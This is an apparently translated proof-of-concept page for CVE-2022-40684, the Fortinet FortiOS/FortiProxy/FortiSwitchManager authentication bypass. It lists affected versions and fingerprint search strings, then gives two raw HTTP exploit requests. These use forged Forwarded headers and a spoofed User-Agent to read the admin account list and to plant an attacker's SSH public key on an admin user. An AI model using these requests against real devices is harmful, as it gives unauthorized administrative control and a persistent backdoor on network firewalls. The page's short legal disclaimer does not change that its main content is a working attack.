
إثبات المفهوم (PoC) واستغلال لـ CVE-2022-40684، وهو تجاوز للمصادقة في واجهات إدارة Fortinet FortiOS وFortiProxy وFortiSwitchManager، مما يتيح وصولًا غير مصرح به للمسؤول عبر طلبات HTTP مصممة خصيصًا.
يجب على أي فرد أو مؤسسة استخدام الإنترنت وفقًا للقوانين الدستورية، والالتزام بالنظام العام، واحترام الأخلاق الاجتماعية، وعدم الإضرار بأمن الشبكات، وعدم استخدام الشبكة للقيام بأنشطة تضر بالأمن القومي أو الشرف أو المصالح.
Fortinet هي شركة عالمية معروفة في مجال منتجات وحلول أمن الشبكات، وتشمل منتجاتها جدران الحماية وبرامج مكافحة الفيروسات وأنظمة منع الاختراق ومكونات أمن الأجهزة الطرفية. في واجهة الإدارة للمنتجات المتأثرة: FortiOS وFortiProxy وFortiSwitchManager، يمكن تجاوز المصادقة باستخدام مسار أو قناة بديلة، ويتمكن المهاجم من إجراء عمليات على واجهة الإدارة دون مصادقة عبر طلبات HTTP أو HTTPS مخصصة.
عالي
FortiOS الإصدار 7.2.0 - 7.2.1
FortiOS الإصدار 7.0.0 - 7.0.6
FortiProxy الإصدار 7.2.0
FortiProxy الإصدار 7.0.0 - 7.0.6
FortiSwitchManager الإصدار 7.2.0
FortiSwitchManager الإصدار 7.0.0
title="FortiProxy“
title="FortiGate"

GET /api/v2/cmdb/system/admin HTTP/1.1
Host: 目标
User-Agent: Node.js
Accept-Encoding: gzip, deflate
Accept: */*
Hosts: 127.0.0.1:9980
Forwarded: by="[127.0.0.1]:80";for="[127.0.0.1]:49490";proto=http;host=
X-Forwarded-Vdom: root

PUT /api/v2/cmdb/system/admin/用户名 HTTP/2
Host: 目标
User-Agent: Report Runner
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Forwarded: for="[127.0.0.1]:8888";by="[127.0.0.1]:8888"
Content-Length: 589
Content-Type: application/json
{"ssh-public-key1": "\"公钥内容\""}

